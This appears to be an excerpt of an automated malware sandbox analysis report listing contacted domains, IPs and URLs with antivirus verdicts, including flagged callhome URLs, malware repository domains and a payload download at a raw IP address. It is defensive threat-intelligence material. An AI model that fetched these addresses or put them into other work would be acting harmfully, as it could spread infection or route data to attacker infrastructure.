http://www.93v0.com/hcaw/?9d=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNpV/H8uI+lgidsfe724rSsodQ5uAfCV2elW9ENMTuv5SSVXQJAcj0qHHf&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
https://raw.github.com/natrim/Sign-Control/master/release.txt	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
http://www.leadchanges.info/mjuo/	0%	Avira URL Cloud	safe
https://www.googleanalytics.com	0%	Avira URL Cloud	safe
http://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+RkpzmaC/oeJhPADFzgiJMLR5FtBl6eht1vjrsMq9ONCaKj3k5GiGvog+&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
https://zz.bdstatic.com/linksubmit/push.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.shahaf3d.com/0a9p/	100%	Avira URL Cloud	malware
http://www.lenovest.xyz/e20q/?9d=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRK6PKTUJmFuSnUKaTSFytHSrQj6qyTDgK0xjAREMwU5wVtegslCXYDiBq&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
http://www.ftp.ftp://ftp.gopher.	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
http://www.srripaspocon.org/egr4/	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
http://www.grecanici.com/4iea/?9d=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp/x6QXeu+cIhmsENqwLKbzAke2hCAvuJuIziLbcuyQtVHWzDtEtwuFhDD&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
http://www.klimkina.pro/4mpz/	0%	Avira URL Cloud	safe
http://www.klimkina.pro/4mpz/?9d=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VpizPsaF86hmUooqlU0clf3MZo9yRfCdtfy1jNGRBq2V4+pMGerSvIMLN&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe
https://www.hostgator.com.br	0%	Avira URL Cloud	safe
https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693	0%	Avira URL Cloud	safe
http://www.leadchanges.info/mjuo/?9d=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsgYEYCrnoxIy0wOTor1QdDe9x8GrLmxcBWSK4ygqmUmz0vTBYLSkIKLnt&G0a=VFN0vBc0ol1ljnb0	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://2.56.245.142/Guzzler.exe	0%	Avira URL Cloud	safe
https://shahaf3d.com	100%	Avira URL Cloud	malware
http://www.grecanici.com/4iea/	0%	Avira URL Cloud	safe
https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.leadchanges.info	0%	Avira URL Cloud	safe
http://www.torentreprenad.com/r45o/	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.klimkina.pro	185.137.235.103	true	false		unknown
dns.ladipage.com	13.228.81.39	true	false		unknown
www.lenovest.xyz	162.0.213.94	true	true		unknown
shahaf3d.com	64.46.118.35	true	true	100%, Sophos S4	unknown
futuregainers.net	195.35.39.119	true	false	100%, Sophos S4	unknown
www.931951.com	172.82.177.221	true	false	100%, Sophos S4	unknown
www.93v0.com	18.178.206.118	true	false	100%, Sophos S4	unknown
srripaspocon.org	15.204.0.108	true	false	100%, Sophos S4	unknown
www.grecanici.com	35.214.235.206	true	false	100%, Sophos S4	unknown
www.torentreprenad.com	194.9.94.86	true	false	100%, Sophos S4	unknown
shopnow321.online	162.241.2.254	true	false		unknown
www.leadchanges.info	66.96.162.149	true	false	100%, Sophos S4	unknown
www.fr2e4o.cfd	unknown	unknown	true		unknown
www.shopnow321.online	unknown	unknown	true		unknown
www.homeppower.com	unknown	unknown	true		unknown
www.x5hh186z.skin	unknown	unknown	true		unknown
www.srripaspocon.org	unknown	unknown	true	100%, Sophos S4	unknown
www.shahaf3d.com	unknown	unknown	true	100%, Sophos S4	unknown
www.againbeautywhiteskin.asia	unknown	unknown	true		unknown
www.futuregainers.net	unknown	unknown	true	100%, Sophos S4	unknown
www.navigate-power.boats	unknown	unknown	true	100%, Sophos S4	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.shopnow321.online/41br/?G0a=VFN0vBc0ol1ljnb0&9d=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rfhm5DYiSLYNIQJZpK4Rmnt3Mzv5831d4ZrhRkHRqInFW2dXaUcZHASEt	false	Avira URL Cloud: safe	unknown
http://www.931951.com/2ha1/	false	Sophos S4: malware repository domain Avira URL Cloud: malware	unknown
http://www.shahaf3d.com/0a9p/?G0a=VFN0vBc0ol1ljnb0&9d=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SaRICxMFUNkXtPm1N7nAwt3H84qVeuxzzlvsq+rVjUlYjzq9gXVFKEYh8	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
http://www.torentreprenad.com/r45o/?9d=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2pnLhFLXOBLrZylJOsjWCWApEJOKs/ooDCJFxqK6p3RZXycGtf6I8hj/U&G0a=VFN0vBc0ol1ljnb0	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.shopnow321.online/41br/	false	Avira URL Cloud: safe	unknown
http://www.93v0.com/hcaw/	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.againbeautywhiteskin.asia/3h10/?9d=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtGTZ1FuoRBIGpq98dFU7vfHeXH9gl+ce92Dv1nZMBIpBNzTq2jDHLjtUw&G0a=VFN0vBc0ol1ljnb0	false	Avira URL Cloud: safe	unknown
http://www.srripaspocon.org/egr4/?9d=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC1S/tz9V2xJeiTRy2uMqSR06k3ZbbYlILY5knN9gwwCUqzf9nwI+FPnn/&G0a=VFN0vBc0ol1ljnb0	false	Sophos S4: malware callhome domain Avira URL Cloud: safe	unknown
http://www.lenovest.xyz/e20q/	false	Avira URL Cloud: safe	unknown
http://www.931951.com/2ha1/?G0a=VFN0vBc0ol1ljnb0&9d=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2LEX+h4RptWZDRuVlG4JzOnajShxrpz3BSvEogxiihZ9tHyNye+qQgWsY	false	Sophos S4: malware repository domain Avira URL Cloud: malware	unknown
http://www.93v0.com/hcaw/?9d=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNpV/H8uI+lgidsfe724rSsodQ5uAfCV2elW9ENMTuv5SSVXQJAcj0qHHf&G0a=VFN0vBc0ol1ljnb0	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.leadchanges.info/mjuo/	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+RkpzmaC/oeJhPADFzgiJMLR5FtBl6eht1vjrsMq9ONCaKj3k5GiGvog+&G0a=VFN0vBc0ol1ljnb0	false	Sophos S4: malware callhome domain Avira URL Cloud: safe	unknown
http://www.lenovest.xyz/e20q/?9d=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRK6PKTUJmFuSnUKaTSFytHSrQj6qyTDgK0xjAREMwU5wVtegslCXYDiBq&G0a=VFN0vBc0ol1ljnb0	false	Avira URL Cloud: safe	unknown
http://www.shahaf3d.com/0a9p/	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
http://www.srripaspocon.org/egr4/	false	Sophos S4: malware callhome domain Avira URL Cloud: safe	unknown
http://www.grecanici.com/4iea/?9d=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp/x6QXeu+cIhmsENqwLKbzAke2hCAvuJuIziLbcuyQtVHWzDtEtwuFhDD&G0a=VFN0vBc0ol1ljnb0	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.klimkina.pro/4mpz/	false	Avira URL Cloud: safe	unknown
http://www.klimkina.pro/4mpz/?9d=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VpizPsaF86hmUooqlU0clf3MZo9yRfCdtfy1jNGRBq2V4+pMGerSvIMLN&G0a=VFN0vBc0ol1ljnb0	false	Avira URL Cloud: safe	unknown
http://www.leadchanges.info/mjuo/?9d=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsgYEYCrnoxIy0wOTor1QdDe9x8GrLmxcBWSK4ygqmUmz0vTBYLSkIKLnt&G0a=VFN0vBc0ol1ljnb0	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://2.56.245.142/Guzzler.exe	false	Avira URL Cloud: safe	unknown
http://www.grecanici.com/4iea/	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.torentreprenad.com/r45o/	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
http://www.againbeautywhiteskin.asia/3h10/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://optimize.google.com	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ozon.ru/	P1 HWT623ATG.bat.exe, GnVIdcfKFYG.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
http://klimkina.pro/4mpz/?9d=Y	compact.exe, 0000001A.00000002.3721935627.000000000495A000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000359A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://niteothemes.com	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://push.zhanzhang.baidu.com/push.js	compact.exe, 0000001A.00000002.3721935627.0000000005134000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-72.png	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shahaf3d.com/wp-admin/admin-ajax.php	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.googleoptimize.com	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Smilet.exe, 00000028.00000001.3704245850.00000000005F2000.00000020.00000001.01000000.00000014.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://youtu.be/uO1hXLmT2j4	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp	false	Avira URL Cloud: safe	unknown
https://fburl.com	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	P1 HWT623ATG.bat.exe, 00000001.00000002.1286350023.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, GnVIdcfKFYG.exe, 0000000A.00000002.1498915015.0000000002553000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aliez.tv/	P1 HWT623ATG.bat.exe, GnVIdcfKFYG.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
https://static.loopia.se/responsive/images/iOS-114.png	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.github.com/natrim/Sign-Control/master/release.txt	P1 HWT623ATG.bat.exe, GnVIdcfKFYG.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	compact.exe, 0000001A.00000002.3721935627.00000000052C6000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003F06000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wordpress.org/plugins/cmp-coming-soon-maintenance/	compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.googleanalytics.com	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://zz.bdstatic.com/linksubmit/push.js	compact.exe, 0000001A.00000002.3721935627.0000000005134000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ftp.ftp://ftp.gopher.	Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	compact.exe, 0000001A.00000003.2728107070.0000000008A65000.00000004.00000020.00020000.00000000.sdmp, bfc.exe, 00000022.00000002.2779194364.000000000040A000.00000004.00000001.01000000.00000012.sdmp, bfc.exe, 00000022.00000000.2730951982.000000000040A000.00000008.00000001.01000000.00000012.sdmp, Smilet.exe, 00000028.00000000.3703313892.000000000040A000.00000008.00000001.01000000.00000013.sdmp, Smilet.exe.35.dr, bfc.exe.26.dr, Guzzler[1].exe.26.dr	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	compact.exe, 0000001A.00000003.2728107070.0000000008A65000.00000004.00000020.00020000.00000000.sdmp, bfc.exe, 00000022.00000002.2779194364.000000000040A000.00000004.00000001.01000000.00000012.sdmp, bfc.exe, 00000022.00000000.2730951982.000000000040A000.00000008.00000001.01000000.00000012.sdmp, Smilet.exe, 00000028.00000000.3703313892.000000000040A000.00000008.00000001.01000000.00000013.sdmp, Smilet.exe.35.dr, bfc.exe.26.dr, Guzzler[1].exe.26.dr	false	Avira URL Cloud: safe	unknown
https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://td.doubleclick.net	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hostgator.com.br	compact.exe, 0000001A.00000002.3721935627.00000000047C8000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003408000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
